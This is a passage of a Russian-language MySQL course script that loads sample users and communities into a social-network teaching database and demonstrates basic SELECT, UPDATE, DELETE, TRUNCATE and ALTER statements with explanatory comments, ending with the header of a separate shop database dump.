,('Екатерина','Соколова','<EMAIL>',6686191671,'f','1984-09-14','Волгоград',NULL,'32800bf3d9a44c1e74c4c697989d4d265c100716','2020-09-25 22:09:27.0')
,('Татьяна','Афанасьева','<EMAIL>',4804069885,'f','1987-05-15','Москва',NULL,'fb762d0873e171610eace7e45c4728888990524d','2020-09-25 22:09:27.0')
,('Алексей','Болгов','<EMAIL>',9391944702,'m','1987-11-26','Омск',NULL,'581e202c66b30b0c2382af4e8d3eac3c831d0ddd','2020-09-25 22:09:27.0')
,('Дмитрий','Древаль','<EMAIL>',8197243501,'m','1983-01-19','Краснодар',NULL,'6b1258bd81342cb6d68ecb3b2fbeeba913bf70f3','2020-09-25 22:09:27.0')
,('Максим','Дубатовкин','<EMAIL>',1835522933,'m','1985-10-13','Москва',NULL,'0e903f53c20657667ee04e67eba9bf70d13e8248','2020-09-25 22:09:27.0')
,('Сергей','Простаков','<EMAIL>',3912001914,'m','1980-03-11','Воронеж',NULL,'e0d1f2c5ea78335ecc106a2d371616cedfc21505','2020-09-25 22:09:27.0')
,('Александр','Пономарев','<EMAIL>',9018710320,'m','1986-12-08','Саратов',NULL,'8b8123b5ccb6aa6c06dbda8c75f91f62f44d5fe3','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Андрей','Косяков','<EMAIL>',1155125246,'m','1981-11-12','Казань',NULL,'965cbe4558dce829055d547a3866f7d982997940','2020-09-25 22:09:27.0')
,('Дмитрий','Косяков','<EMAIL>',4947082181,'m','1983-03-05','Краснодар',NULL,'460c92435c10f0ae5c3bb7596bc3ed757cbee69f','2020-09-25 22:09:27.0')
,('Людмила','Скаба','<EMAIL>',1236239169,'f','1989-01-28','Воронеж',NULL,'a1cc4ab2add1ed470fa93495ece29978a51f8c00','2020-09-25 22:09:27.0')
,('Дмитрий','Смольянинов','<EMAIL>',2249473665,'m','1987-10-17','Тольятти',NULL,'1976170ea8cb1a94b5572e5e67baad29c1a569fa','2020-09-25 22:09:27.0')
,('Вячеслав','Допперт','<EMAIL>',8301549057,'m','1981-10-02','Тюмень',NULL,'5de1843e1bce099134f41d1522c17363245fc778','2020-09-25 22:09:27.0')
,('Елена','Стрыгина','<EMAIL>',1086531264,'f','1988-05-04','Волгоград',NULL,'deddfab8a1ec0d8b3395b3d692ddae01aafcfc22','2020-09-25 22:09:27.0')
,('Сергей','Анисимов','<EMAIL>',5525263441,'m','1982-03-13','Саратов',NULL,'e6582cbf8420fc471078f4e118fade0afb9830eb','2020-09-25 22:09:27.0')
,('Вячеслав','Гамов','<EMAIL>',7393531761,'m','1982-11-10','Красноярск',NULL,'4fdd2cbb6dfa134449dc7c0186f8ab86c56058f2','2020-09-25 22:09:27.0')
,('Юрий','Довка','<EMAIL>',6139086790,'m','1980-01-29','Саратов',NULL,'c2230720a13c0dbe4123d982a09fdfb421d85ae1','2020-09-25 22:09:27.0')
,('Александр','Калинин','<EMAIL>',3392340667,'m','1982-10-29','Воронеж',NULL,'1e32b1e9e9066c24064cafebf9ed40aaf3aa647b','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Николай','Пивоваров','<EMAIL>',7988872107,'m','1988-05-20','Краснодар',NULL,'204b2aedb33e12cdf4a3a0e9737e945870b17081','2020-09-25 22:09:27.0')
,('Алексей','Тимошенко','<EMAIL>',6741632937,'m','1989-09-17','Саратов',NULL,'ce449325f74a523bc1556da3d19921c684259925','2020-09-25 22:09:27.0')
,('Екатерина','Богомолова','<EMAIL>',3151907707,'f','1988-12-27','Тольятти',NULL,'f1967dc12ed090fa0dd7259e2485cce97865e4d1','2020-09-25 22:09:27.0')
,('Марина','Голощапова','<EMAIL>',7783646176,'f','1986-02-11','Екатеринбург',NULL,'60ada1812162902fdf036cd8f41aed0b1ae31866','2020-09-25 22:09:27.0')
,('Инна','Дибцева','<EMAIL>',4963297188,'f','1986-01-05','Волгоград',NULL,'74f7ad69beb17f40608046522c6cfe2ab75ffdfb','2020-09-25 22:09:27.0')
,('Дмитрий','Попов','<EMAIL>',9517280949,'m','1982-02-26','Красноярск',NULL,'c99c810a5782926b16d2aae0f5a029c3ca0de755','2020-09-25 22:09:27.0')
,('Галина','Рукавицына','<EMAIL>',3923826386,'f','1984-11-06','Челябинск',NULL,'3a19575039593db8300b30e3051cf15890783bbc','2020-09-25 22:09:27.0')
,('Никита','Рыкунов','<EMAIL>',8487221955,'m','1984-06-03','Краснодар',NULL,'404bb0046780c0377ef1e96ce9001a701668c6c6','2020-09-25 22:09:27.0')
,('Анастасия','Рыкунова','<EMAIL>',8066940781,'f','1986-02-13','Тюмень',NULL,'2d9f4c408a47c268a31fc39809d2fb04a2a04ec3','2020-09-25 22:09:27.0')
,('Юрий','Саблин','<EMAIL>',8186433808,'m','1982-11-23','Уфа',NULL,'d0f98fc4b115f0ca2122f1ea0f53cdff006e0a90','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Алексей','Самсонов','<EMAIL>',1437600801,'m','1986-03-09','Самара',NULL,'a6042fbaffba5d97f05baf9bfe6163722d1d640d','2020-09-25 22:09:27.0')
,('Екатерина','Соколова','<EMAIL>',9798286372,'f','1982-08-25','Пермь',NULL,'60fb33d672eff5d474f18309e11320f40b7e7b4f','2020-09-25 22:09:27.0')
,('Татьяна','Афанасьева','<EMAIL>',5794027202,'f','1981-09-06','Волгоград',NULL,'9967a9836ae9a490691dc6a7abf921c13de7693b','2020-09-25 22:09:27.0')
,('Алексей','Болгов','<EMAIL>',4243478042,'m','1986-08-21','Челябинск',NULL,'f0fe0f1cc166c63a8a8ec4ed6b0d56d4a6dc12c5','2020-09-25 22:09:27.0')
,('Дмитрий','Древаль','<EMAIL>',7191538491,'m','1983-05-17','Красноярск',NULL,'c94230c5967832c1cab80d57668a6d2418f3ce0e','2020-09-25 22:09:27.0')
,('Максим','Дубоваткин','<EMAIL>',5466692275,'m','1984-05-26','Волгоград',NULL,'81d0d1ebcd2d75030d7f2fceab8e229e2795b1f2','2020-09-25 22:09:27.0')
,('Сергей','Простаков','<EMAIL>',3805318987,'m','1987-02-03','Уфа',NULL,'b896871061ded2bcdd77430613f262046c0465e5','2020-09-25 22:09:27.0')
,('Александр','Пономарев','<EMAIL>',9972401583,'m','1984-07-17','Пермь',NULL,'4ecb30007604ee7baf41e5b68cf4bb5e45cfb9c9','2020-09-25 22:09:27.0')
,('Максим','Паршин','<EMAIL>',1672124574,'m','1985-04-26','Санкт-Петербург',NULL,'7bc86a9ac9b93f30c1af49c7423cc27c2773bd57','2020-09-25 22:09:27.0')
,('Алексей','Петров','<EMAIL>',6387066678,'m','1987-06-13','Краснодар',NULL,'6b3dd04daee595084ee9ff21279fe2b27cf87d3b','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Николай','Сидоров','<EMAIL>',4521952112,'m','1984-09-21','Самара',NULL,'6c99e35fcb1313640ecc9ef074767cd912cb5fa3','2020-09-25 22:09:27.0')
,('Александр','Ворфоломеев','<EMAIL>',4552946215,'m','1983-09-08','Челябинск',NULL,'9e27dbd35bf80d7b000b78987f8136742db78694','2020-09-25 22:09:27.0')
,('Алексей','Алехин','<EMAIL>',5019199432,'m','1981-03-28','Екатеринбург',NULL,'162f709959774d806963d0f4cf7946c3fd2d8a48','2020-09-25 22:09:27.0')
,('Екатерина','Паршина','<EMAIL>',8393364396,'f','1984-05-16','Челябинск',NULL,'6213391ec7ef13d231e308d9e37d27bc3826f5d0','2020-09-25 22:09:27.0')
,('Наталья','Трубицына','<EMAIL>',6376414090,'f','1987-08-20','Москва',NULL,'c416fe919541a2135942fae312c6b9fa450b9910','2020-09-25 22:09:27.0')
,('Екатерина','Паршина','<EMAIL>',7506356015,'f','1987-08-27','Челябинск',NULL,'59c2c1bab5ce4f157ca65c0008d9dded06f77747','2020-09-25 22:09:27.0')
,('Евгения','Кривцова','<EMAIL>',1633500921,'f','1987-11-28','Красноярск',NULL,'d39dd4390bdcd9c5d439c0fe6a3c4a327af221eb','2020-09-25 22:09:27.0')
,('Анастасия','Бурмистрова','<EMAIL>',9894901275,'f','1980-11-03','Уфа',NULL,'b703cb35fb2298673e577f461482a2faeaaf1eab','2020-09-25 22:09:27.0')
,('Елена','Воронова','<EMAIL>',2018695545,'f','1980-04-12','Тольятти',NULL,'b00c41bb74b9ae30d9513d48a1245e618fc5b210','2020-09-25 22:09:27.0')
,('Наталья','Заводскова','<EMAIL>',3372167202,'f','1986-10-29','Пермь',NULL,'1b79c1723c0a8c65120d12a6be69a8fb9970a5b6','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Сергей','Воронин','<EMAIL>',2624066456,'m','1985-06-21','Тюмень',NULL,'d92336e60a1c39ef40a442db8758173836d127ad','2020-09-25 22:09:27.0')
,('Юлия','Баранова','<EMAIL>',8826412568,'f','1986-04-11','Челябинск',NULL,'6b3a60494a2592cf1f643059de580662cc6cc524','2020-09-25 22:09:27.0')
,('Марина','Семикоз','<EMAIL>',2822165316,'f','1981-04-23','Самара',NULL,'b8d39e2a6a1b8add765f7f8cc02785f15d692c1c','2020-09-25 22:09:27.0')
,('Андрей','Буланый','<EMAIL>',1823731974,'m','1989-06-04','Казань',NULL,'83097b2b4d64b3e3c90487facd26beb9515434f4','2020-09-25 22:09:27.0')
,('Мария','Тафинцева','<EMAIL>',9835391400,'f','1987-02-07','Екатеринбург',NULL,'97f853a5ca84ffbd28b671b50e4da74c31091289','2020-09-25 22:09:27.0')
,('Ольга','Аксененкова','<EMAIL>',3841390714,'f','1984-05-14','Пермь',NULL,'c559cb1c9fc131914c12fe954f336adfcfce9dc0','2020-09-25 22:09:27.0')
,('Виктория','Лунева','<EMAIL>',7213293360,'f','1985-04-28','Уфа',NULL,'8d9633614bbba01c2321c8ae792e81076353018e','2020-09-25 22:09:27.0')
,('Александр','Федоров','<EMAIL>',5226134225,'m','1986-12-29','Саратов',NULL,'bc80127d933e0d328ecdae39339f46eee4466085','2020-09-25 22:09:27.0')
,('Любовь','Корчагина','<EMAIL>',9967628912,'f','1980-09-13','Омск',NULL,'83ddcad57c2f0fdad119f7ef5b0868b5bbc6db39','2020-09-25 22:09:27.0')
,('Ольга','Щербинина','<EMAIL>',9827001278,'f','1983-02-13','Нижний Новгород',NULL,'7d73b3cf8f25f66e0dcda5cdf5b86cc95a40087f','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Александр','Лебедев','<EMAIL>',1243478465,'m','1982-09-05','Воронеж',NULL,'7d5b5340ccd8aa195530d45b0d531874c3157744','2020-09-25 22:09:27.0')
,('Павел','Островерхов','<EMAIL>',9958667317,'m','1980-04-20','Ростов-на-Дону',NULL,'38ceff79c9a3dc3022a29d4a321b8e1c1f9d573c','2020-09-25 22:09:27.0')
,('Юлия','Гаршина','<EMAIL>',4644317051,'f','1982-11-19','Челябинск',NULL,'0705130b93d6ad48ed4a4cf1121b6c2da22451a5','2020-09-25 22:09:27.0')
,('Юлия','Якушева','<EMAIL>',5124099962,'f','1986-12-01','Казань',NULL,'a4855604e4b371d4fc08269aadf4e53f41572af2','2020-09-25 22:09:27.0')
,('Александр','Поротиков','<EMAIL>',2443934792,'m','1989-01-27','Ростов-на-Дону',NULL,'7736a217376b568df8b3ccf9abb2b33d369651ab','2020-09-25 22:09:27.0')
,('Антон','Гончаров','<EMAIL>',3353138089,'m','1984-05-12','Воронеж',NULL,'5e89b185348a2952d14d63ca8a8e918cbe76ffb6','2020-09-25 22:09:27.0')
,('Юлия','Захарова','<EMAIL>',9601298201,'f','1988-05-29','Тюмень',NULL,'29836521a8aaf747e81a4b73815567d2f0c391f2','2020-09-25 22:09:27.0')
,('Елена','Тарасова','<EMAIL>',3135058629,'f','1985-05-20','Челябинск',NULL,'1a774e0a50f50122bf651dfcac8fbd7093fbadfe','2020-09-25 22:09:27.0')
,('Татьяна','Белоусова','<EMAIL>',9137682198,'f','1989-04-11','Пермь',NULL,'6612e2fcf05eb06abf6a270836c6bb0929881d2d','2020-09-25 22:09:27.0')
,('Кристина','Комова','<EMAIL>',7535680736,'f','1983-08-14','Санкт-Петербург',NULL,'bb35c705937669867fcb722070e7beb2d10ab622','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Максим','Никитин','<EMAIL>',7735098294,'m','1980-05-29','Краснодар',NULL,'ae2706b4f4b393f95331b1686ed391bc4d5c997a','2020-09-25 22:09:27.0')
,('Оксана','Снегирева','<EMAIL>',7267503662,'f','1986-05-20','Волгоград',NULL,'117e128e47bf9990fb42667c532fea870148154e','2020-09-25 22:09:27.0')
,('Виктория','Руднева','<EMAIL>',6437005614,'f','1981-06-21','Пермь',NULL,'e161196978199abbf0aae9db3646c92160edb97a','2020-09-25 22:09:27.0')
,('Елена','Аржанова','<EMAIL>',3264294858,'f','1980-11-03','Тюмень',NULL,'27a45adcbb383228b8998eb3074059471a3143f0','2020-09-25 22:09:27.0')
,('Федор','Шипко','<EMAIL>',8854406327,'m','1989-05-14','Самара',NULL,'f6576f732765b8b40fd758bcc0a83b65dea45ca1','2020-09-25 22:09:27.0')
,('Юлия','Тамбовцева','<EMAIL>',5792854326,'f','1983-01-10','Саратов',NULL,'27c2a6980f55455a7de39f0f4afbe96a112ae5c7','2020-09-25 22:09:27.0')
,('Ольга','Козаренко','<EMAIL>',8076928589,'f','1981-09-01','Краснодар',NULL,'8da5db5f87ef06c2f7fb67846068d728e1f4fde2','2020-09-25 22:09:27.0')
,('Наталья','Волкова','<EMAIL>',3467878579,'f','1985-12-07','Омск',NULL,'60c3e33d3702766312b99c42d1be3a98b5e3eeaa','2020-09-25 22:09:27.0')
,('Юлия','Лысакова','<EMAIL>',6804310209,'f','1981-06-26','Саратов',NULL,'3cfb6181608ca073d4d59432c71d36ce3fb1bdbe','2020-09-25 22:09:27.0')
,('Владимир','Почепцов','<EMAIL>',4101819985,'m','1987-01-02','Нижний Новгород',NULL,'c3b0adc093cbc45a0e02275a13a1f7e3609b257e','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Евгения','Конникова','<EMAIL>',4578422856,'f','1989-10-09','Волгоград',NULL,'9f85a0b32ae7fb3e952fa6f38de5a5405fc03810','2020-09-25 22:09:27.0')
,('Наталья','Козлитина','<EMAIL>',5302291765,'f','1983-03-02','Новосибирск',NULL,'c75642bc2173f416bae563603aef9c3cee7a220e','2020-09-25 22:09:27.0')
,('Марат','Назмиев','<EMAIL>',3696664396,'m','1989-02-16','Санкт-Петербург',NULL,'632cad88930380e011ef6423ac7a615cb62d81c7','2020-09-25 22:09:27.0')
,('Дмитрий','Тимашов','<EMAIL>',4771920220,'m','1983-02-13','Тюмень',NULL,'38860af616b46f31444b2e0e570318a3b6491f77','2020-09-25 22:09:27.0')
,('Александр','Маричев','<EMAIL>',1703242914,'m','1981-08-01','Казань',NULL,'6403618b2d91965c995eeb165fb1810c5494a3e1','2020-09-25 22:09:27.0')
,('Дина','Савельева','<EMAIL>',1277342028,'f','1987-12-03','Ростов-на-Дону',NULL,'1e031de4f2b7a76c2f622b63cb1c6844c90094ec','2020-09-25 22:09:27.0')
,('Федор','Шипко','<EMAIL>',5234996624,'m','1989-02-21','Санкт-Петербург',NULL,'9f02e6161b06ca3568c93d900f54cf24334c6c97','2020-09-25 22:09:27.0')
,('Василий','Безрученко','<EMAIL>',3877536636,'m','1982-04-26','Санкт-Петербург',NULL,'8b70f86d265f5e021b157d3ead188efb0ea3374f','2020-09-25 22:09:27.0')
,('Дмитрий','Литаврин','<EMAIL>',9947066870,'m','1983-05-10','Омск',NULL,'5ea7a3f00a784345a7c7df7dbf303921565c4bf2','2020-09-25 22:09:27.0')
,('Константин','Стародубцев','<EMAIL>',9286831036,'m','1986-08-23','Волгоград',NULL,'fabb15a627158fbc7f8be2119755ef0ecf08e81a','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Ольга','Кузнецова','<EMAIL>',3532624836,'f','1986-09-15','Нижний Новгород',NULL,'0558138813a372455cce703fefc719b65604da68','2020-09-25 22:09:27.0')
,('Антон','Борников','<EMAIL>',7377444639,'m','1983-02-10','Казань',NULL,'73351c9bf23a7e4e03f29ebd37b949ae1b866d09','2020-09-25 22:09:27.0')
,('Роман','Тарарыков','<EMAIL>',3451661646,'m','1988-04-13','Саратов',NULL,'ab4de688bf85cf865982dc2f2dc5a7e062ba54e5','2020-09-25 22:09:27.0')
,('Ольга','Ищенко','<EMAIL>',1132812314,'f','1985-12-04','Екатеринбург',NULL,'843d6df418382066775420211bf9f923b6885c62','2020-09-25 22:09:27.0')
,('Павел','Трунтаев','<EMAIL>',2312476133,'m','1985-05-21','Тольятти',NULL,'a34f88e21214740c1f0713a0b7158f035371ae52','2020-09-25 22:09:27.0')
,('Марина','Власова','<EMAIL>',5978627731,'f','1983-09-18','Санкт-Петербург',NULL,'a90f3046a469a20d596d46f5868a3236cb56b410','2020-09-25 22:09:27.0')
,('Сергей','Беляев','<EMAIL>',2489356708,'m','1986-07-11','Уфа',NULL,'78239b73d2286ecc07f0931666564f334b39bf0e','2020-09-25 22:09:27.0')
,('Татьяна','Морозова','<EMAIL>',8806637099,'f','1989-07-02','Екатеринбург',NULL,'ef981b22143faa2ddd2e3e7938bf604de1020059','2020-09-25 22:09:27.0')
,('Татьяна','Нестерова','<EMAIL>',9413536022,'f','1986-05-01','Казань',NULL,'5eccaf8d7038358b307c14336cd565cb49f365c3','2020-09-25 22:09:27.0')
,('Евгений','Волынкин','<EMAIL>',5752887260,'m','1989-09-16','Москва',NULL,'c2b671c251b4ed3838644585b047d0a1a3704133','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Надежда','Реукова','<EMAIL>',9404156548,'f','1982-12-22','Казань',NULL,'95c0a7d5089c0ccf6fe8c88113462c2ab6950a17','2020-09-25 22:09:27.0')
,('Марина','Лямзина','<EMAIL>',5614317170,'f','1984-02-11','Екатеринбург',NULL,'425f5bab4afc290c1ec5e904cbed27fcf4c97f71','2020-09-25 22:09:27.0')
,('Любовь','Карташова','<EMAIL>',9468369832,'f','1981-12-25','Тольятти',NULL,'4b069e5454103bc745477798dd66ea134c242a92','2020-09-25 22:09:27.0')
,('Алексей','Золототрубов','<EMAIL>',2003010211,'m','1984-08-30','Красноярск',NULL,'2d7566a285d69d24b2ad0753bbaeddc945aecc83','2020-09-25 22:09:27.0')
,('Татьяна','Гуляева','<EMAIL>',9006045417,'f','1989-07-27','Воронеж',NULL,'c4ec50ac1c3064f80f4cfd877ba2563928a33e27','2020-09-25 22:09:27.0')
,('Юлия','Сысоева','<EMAIL>',9613106434,'f','1987-11-14','Новосибирск',NULL,'87acb7a49196ed113ddf732a9a41a1291a68cb87','2020-09-25 22:09:27.0')
,('Александр','Борисов','<EMAIL>',6559915444,'m','1982-05-17','Краснодар',NULL,'10253a915f1b47f3032c84c71d7fd86a5a6624e8','2020-09-25 22:09:27.0')
,('Анатолий','Косинов','<EMAIL>',3036324530,'m','1983-06-01','Самара',NULL,'d1532c3b8e8682bc769b2606320a1a0f54fc5925','2020-09-25 22:09:27.0')
,('Ольга','Меланьина','<EMAIL>',3193637029,'f','1981-05-06','Красноярск',NULL,'6df61ed9ad812e2f327ae87bc855302c28f1c2e0','2020-09-25 22:09:27.0')
,('Ольга','Дубищева','<EMAIL>',3234549546,'f','1987-04-11','Москва',NULL,'4e33f3ac62368f7104b84612d0b1ab518<PASSWORD>','2020-09-25 22:09:27.0')
;
INSERT INTO users (firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
('Федор','Шипко','<EMAIL>',9608691146,'m','1984-06-14','Ростов-на-Дону',NULL,'5ccde04c88913a29f096d5ccfc1e9ec0cce67a71','2020-09-25 22:09:27.0')
,('Татьяна','Севостьянова','<EMAIL>',8065210191,'f','1980-07-11','Новосибирск',NULL,'26a73caff7a0774d854d085586394becd291dc84','2020-09-25 22:09:27.0')
,('Инна','Красникова','<EMAIL>',2141664371,'f','1987-11-03','Казань',NULL,'b6f4fe122245e18ccbdf12bcf354bd693a87fedc','2020-09-25 22:09:27.0')
,('Светлана','Гарьковская','<EMAIL>',9804639490,'f','1981-05-20','Красноярск',NULL,'c6ae3d969345bc2cacf2cf324468e5bae8fd449c','2020-09-25 22:09:27.0')
,('Эльза','Самороковская','<EMAIL>',8894215795,'f','1987-05-10','Красноярск',NULL,'e643ae9bdbefd5da4c4e18a47c46f2db8b33f603','2020-09-25 22:09:27.0')
,('Елена','Орлова','<EMAIL>',3913069006,'f','1988-08-11','Самара',NULL,'5f37954b9fce380080982e51adba07e0718d0052','2020-09-25 22:09:27.0')
,('Галина','Стрельникова','<EMAIL>',3699040307,'f','2020-09-05','Тюмень',NULL,'0b5fcf87309858b956cc164df1a61acf8ca4773a','2020-09-25 22:09:27.0')
,('Светлана','Назарова','<EMAIL>',2811501912,'f','1984-04-07','Омск',NULL,'ad20ef3e300cc51ec105d937689feecfca82b66c','2020-09-25 22:09:27.0')
,('Антон','Шарыкин','<EMAIL>',8866959892,'m','1989-03-04','Санкт-Петербург',NULL,'e28882d420f3f02df4ef85cf57a7900520dd19bf','2020-09-25 22:09:27.0')
,('Ирина','Хусаинова','<EMAIL>',6843424170,'f','1983-12-28','Тольятти',NULL,'b607f0f3ba714a20ee76785f523585be6fa4a022','2020-09-25 22:09:27.0')
;
INSERT INTO communities (name) VALUES
('PHP')
,('Planetaro')
,('Ruby')
,('Vim')
,('Ассемблер в Linux для программистов C')
,('Аффинные преобразования')
,('Биология клетки')
,('Древнекитайский язык')
,('Знакомство с методом математической индукции')
,('Информация, системы счисления')
;
INSERT INTO communities (name) VALUES
('Кодирование текста и работа с ним')
,('Комплексные числа')
,('Лингва де планета')
,('Лисп')
,('Математика случая')
,('Микромир, элементарные частицы, вакуум')
,('Московская олимпиада по информатике')
,('Оцифровка печатных текстов')
,('Реализации алгоритмов')
,('Регулярные выражения')
;
INSERT INTO communities (name) VALUES
('Рекурсия')
,('Русский язык')
,('Создание электронной копии книги в формате DjVu в Linux')
,('Токипона')
,('Учебник логического языка')
,('Что такое вычислительная математика')
,('Электронные таблицы в Microsoft Excel')
,('Эсперанто? Зачем?')
,('Язык Си в примерах')
,('Японский язык')
;
-- CRUD
-- create - insert
-- read - select
-- update - update
-- delete - delete, truncate
-- INSERT... VALUES
INSERT INTO users
(id, firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at)
VALUES
(300,'Сергей','Сергеев','<EMAIL>',123123123,'m','1983-03-21','Саратов',NULL,
'fdkjgsdflskdjfgsdfg142356214','2020-09-25 22:09:27.0');
INSERT INTO users (id,firstname,lastname,email,phone,gender,birthday,hometown,photo_id,pass,create_at) VALUES
(301,'Дмитрий','Тимашов','<EMAIL>',4513359033,'m','1984-06-19','Казань',NULL,'e6ab5f555555fb26c7c60ddd23c8118307804330','2020-09-25 22:09:27.0')
,(302,'Владислав','Авраменко','<EMAIL>',1874462339,'m','1987-07-07','Москва',NULL,'b25e49362b83833eece7d225717f2e285213bf25','2020-09-25 22:09:27.0')
,(303,'Алексей','Величко','<EMAIL>',2951798252,'m','1984-11-27','Казань',NULL,'07521436ef4b4ad464ed04cdceb99f422bbbd9c5','2020-09-25 22:09:27.0')
,(304,'Артем','Филипцов','<EMAIL>',3237322265,'m','1984-08-04','Краснодар',NULL,'5aac7b105729d4ad431db6a4e73604ecec132fa8','2020-09-25 22:09:27.0')
,(305,'Елена','Колдаева','<EMAIL>',3731144657,'f','1989-08-07','Тюмень',NULL,'ba6c51c3064c20f9de84d4ed69733d9dd408e504','2020-09-25 22:09:27.0')
,(306,'Андрей','Антипов','<EMAIL>',8774858608,'m','1984-09-04','Красноярск',NULL,'16f4e6ac1aedd2d970<PASSWORD>','2020-09-25 22:09:27.0');
-- INSERT ... SET
INSERT INTO users
set
firstname='Евгений',
lastname='Грачев',
email='<EMAIL>',
phone=9744906651,
gender='m',
birthday='1987-11-26',
hometown='Омск',
pass='<PASSWORD>';
-- INSERT ... select
-- insert into communities (name)
-- select name from snet.communities;
-- insert into users (firstname, lastname, email, phone, birthday, hometown, gender, pass)
-- select firstname, lastname, email, phone, birthday, hometown, gender, pass from snet0611_filldb.users
-- order by birthday desc limit 10;
-- select
select * from users; -- выбираем всё
select * from users limit 10; -- выбираем первые 10 записей
select * from users limit 10 offset 10;-- пропускаем первые 10 (offset), выбираем 10
select * from users limit 3,8; -- select * from users limit 8 offset 3;
select lastname, firstname, phone from users; -- выбираем данные из 3х столбцов
select lastname, firstname, phone from users order by lastname desc; -- сортируем по фамилии в алф. порядке asc - возр, desc - убыв.
select hometown, lastname, firstname, phone from users order by hometown desc, lastname asc; -- сортировака по нескольким столбцам с разным направлением сортировки
select 'hello!'; -- используем для вывода строки
select 3*8; -- работают арифметические операторы
select concat(lastname, ' ', firstname) as persons from users;-- склейка строки с пом. ф-ции concat, добавили алиас для столбца в результирующей выборке
select concat(lastname,' ', substring(firstname, 1,1), '.') persons from users; -- "обрезаем" имя до первого символа
select distinct hometown from users; -- получаем только уникальные строки
select * from users where hometown = 'Челябинск';
select lastname, firstname, hometown from users
where hometown = 'Москва' or hometown ='Санкт-Петербург' or hometown ='Нижний Новгород'; -- ограничения where с "или"
select lastname, firstname, hometown, gender from users
where hometown = 'Москва' or gender = 'm'; -- ограничения where с "или"
select lastname, firstname, hometown, gender from users
where hometown = 'Москва' and gender = 'm';-- ограничения where с "и"
select lastname, firstname, hometown from users where hometown in ('Москва', 'Санкт-Петербург', 'Нижний Новгород'); -- in позволяет задавать несколько значений в where
select lastname, firstname, hometown from users where hometown != 'Москва'; -- город НЕ Москва
select lastname, firstname, hometown from users where hometown <> 'Москва'; -- аналогично предыдущему
select lastname, firstname, birthday from users where birthday >= '1985-01-01'; -- условие больше или равно
select lastname, firstname, birthday from users where birthday >= '1985-01-01' and birthday <= '1990-01-01';-- выборка между значениями условий
select lastname, firstname, birthday from users where birthday between '1985-01-01' and '1990-01-01'; -- аналогично предыдущему
select lastname, firstname from users where lastname like 'Ки%'; -- поиск подстроки, начинающейся на "Ки" и содержащей далее 0 или более символов (%)
select lastname, firstname from users where lastname like '%ко'; -- поиск подстроки, заканчивающейся на "ко" и содержащей перед этим 0 или более символов или более символов (%)
select lastname, firstname from users where lastname like 'Ки_еева';
select lastname, firstname from users where lastname like '_____';
select count(*) from users; -- 209
select count(hometown) from users; -- 207
select count(distinct hometown) from users; -- 19
select hometown, count(*) from users group by hometown; -- группируем по городу и считаем, сколько пользователей в каждом городе
select hometown, count(*) from users group by hometown having count(*) >= 10; -- выбираем строки, где пользователей в каждом городе >= 10
-- UPDATE
update users
set
hometown = 'Москва',
gender = 'f'
where hometown is null;
update friend_requests
set status = 'approved'
where initiator_user_id = 11 and target_user_id = 13;
-- DELETE
delete from communities where name = 'Биолог<NAME>';
delete from communities where id between 20 and 30;
delete from communities;
-- TRUCATE
set foreign_key_checks = 0; -- отключили проверку внешних ключей
truncate table communities;
set foreign_key_checks = 1; -- включить проверку внешних ключей
-- посмотреть код создания таблицы
show create table communities;
CREATE TABLE `communities` (
`id` bigint unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(150) DEFAULT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `id` (`id`),
KEY `name` (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_0900_ai_ci;
-- Разбор ДЗ№3
-- 1)
-- user_id
-- obj_id
-- obj_type ENUM ('user', 'post', 'comment')
-- 2) для каждого объекта создать отдельную таблицу : лайки для пользователей, лайки для постов, лайки для фото...
-- ДЗ п.1
--
-- 1) с помощью alter поставить в табл. friends_reqiests default status requested
-- 2) с помощью alter поставить в табл. переименова create_at в created_at
-- п2. заполнить табл. likes данными
ALTER table postslikes
CHANGE likedornot likeexists char(1);
ALTER table friend_requests
alter status set default 'requested';
update commentslikes
set likedornot = '0'
where likedornot != 1;
update postslikes
set likeexists = '0'
where likeexists != 1;
update photoslikes
set likedornot = '0'
where likedornot != 1;<file_sep>-- MySQL dump 10.13 Distrib 8.0.22, for Win64 (x86_64)
--
-- Host: localhost Database: shop
-- ------------------------------------------------------
-- Server version 8.0.22
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!50503 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
